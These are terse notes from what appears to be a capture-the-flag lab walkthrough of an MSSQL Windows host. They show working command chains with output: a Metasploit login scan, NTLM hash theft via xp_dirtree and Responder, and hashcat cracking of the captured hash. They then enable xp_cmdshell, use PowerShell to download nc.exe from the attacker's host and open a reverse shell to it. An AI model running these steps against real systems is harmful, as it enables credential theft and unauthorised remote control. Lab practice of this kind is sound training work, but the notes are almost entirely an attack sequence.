4 mssql using msf

use auxiliary/scanner/mssql/mssql_login

msf6 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 10.10.10.125
RHOSTS => 10.10.10.125
msf6 auxiliary(scanner/mssql/mssql_login) > set USERNAME reporting
USERNAME => reporting
msf6 auxiliary(scanner/mssql/mssql_login) > set PASSWORD PcwTWTHRwryjc$c6
msf6 auxiliary(scanner/mssql/mssql_login) > set USE_WINDOWS_AUTHENT true
USE_WINDOWS_AUTHENT => true

msf6 auxiliary(scanner/mssql/mssql_login) > run
[*] 10.10.10.125:1433     - 10.10.10.125:1433 - MSSQL - Starting authentication scanner.
[!] 10.10.10.125:1433     - No active DB -- Credential data will not be saved!
[+] 10.10.10.125:1433     - 10.10.10.125:1433 - Login Successful: WORKSTATION\reporting:PcwTWTHRwryjc$c6
[*] 10.10.10.125:1433     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution complete

# trying to steal NTLM Creds

msf6 > use auxiliary/admin/mssql/mssql_ntlm_stealer
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set USERNAME reporting
USERNAME => reporting
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set PASSWORD PcwTWTHRwryjc$c6
PASSWORD => PcwTWTHRwryjc$c6
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set USE_WINDOWS_AUTHENT true
USE_WINDOWS_AUTHENT => true

# start responder 
| sudo responder -I tun0

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > run
[*] 10.10.10.125:1433     - DONT FORGET to run a SMB capture or relay module!
[*] 10.10.10.125:1433     - Forcing SQL Server at 10.10.10.125 to auth to 10.10.14.24 via xp_dirtree...
[+] 10.10.10.125:1433     - Successfully executed xp_dirtree on 10.10.10.125
[+] 10.10.10.125:1433     - Go check your SMB relay or capture module for goodies!
[*] 10.10.10.125:1433     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[SMB] NTLMv2-SSP Client   : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc::QUERIER:f8ae4ad0769fd34e:3C53678686FB91DF9D3EAF286B5BBC19:0101000000000000009F86B14BD6D701EC153CB908CBCE57000000000200080038004B0052004E0001001E00570049004E002D0047004C005800300050004A00370031004A004200520004003400570049004E002D0047004C005800300050004A00370031004A00420052002E0038004B0052004E002E004C004F00430041004C000300140038004B0052004E002E004C004F00430041004C000500140038004B0052004E002E004C004F00430041004C0007000800009F86B14BD6D701060004000200000008003000300000000000000000000000003000009B3FD06070E3AA7D9FF0AB1E49CDE69779EDDCB1936BAE1FDB0B22BAF8E4DE150A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003400000000000000000000000000

https://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/

$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --show
MSSQL-SVC::QUERIER:f8ae4ad0769fd34e:3c53678686fb91df9d3eaf286b5bbc19:0101000000000000009f86b14bd6d701ec153cb908cbce57000000000200080038004b0052004e0001001e00570049004e002d0047004c005800300050004a00370031004a004200520004003400570049004e002d0047004c005800300050004a00370031004a00420052002e0038004b0052004e002e004c004f00430041004c000300140038004b0052004e002e004c004f00430041004c000500140038004b0052004e002e004c004f00430041004c0007000800009f86b14bd6d701060004000200000008003000300000000000000000000000003000009b3fd06070e3aa7d9ff0ab1e49cde69779eddcb1936bae1fdb0b22baf8e4de150a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0032003400000000000000000000000000:corporate568


$ mssqlclient.py QUERIER/mssql-svc:corporate568@10.10.10.125 -windows-auth
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands

SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> EXEC xp_cmdshell "whoami"
output
------------------------------
querier\mssql-svc                                                                                                                                               


# shell using 
EXEC xp_cmdshell "powershell -c (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.24/nc.exe','c:\users\public\nc.exe');"
EXEC xp_cmdshell "c:\users\public\nc.exe -e cmd.exe 10.10.14.24 6969"

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.24] from (UNKNOWN) [10.10.10.125] 49681
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
querier\mssql-svc

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\Windows\system32>systeminfo

Host Name:                 QUERIER
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
System Type:               x64-based PC
Hotfix(s):                 6 Hotfix(s) Installed.

Last updated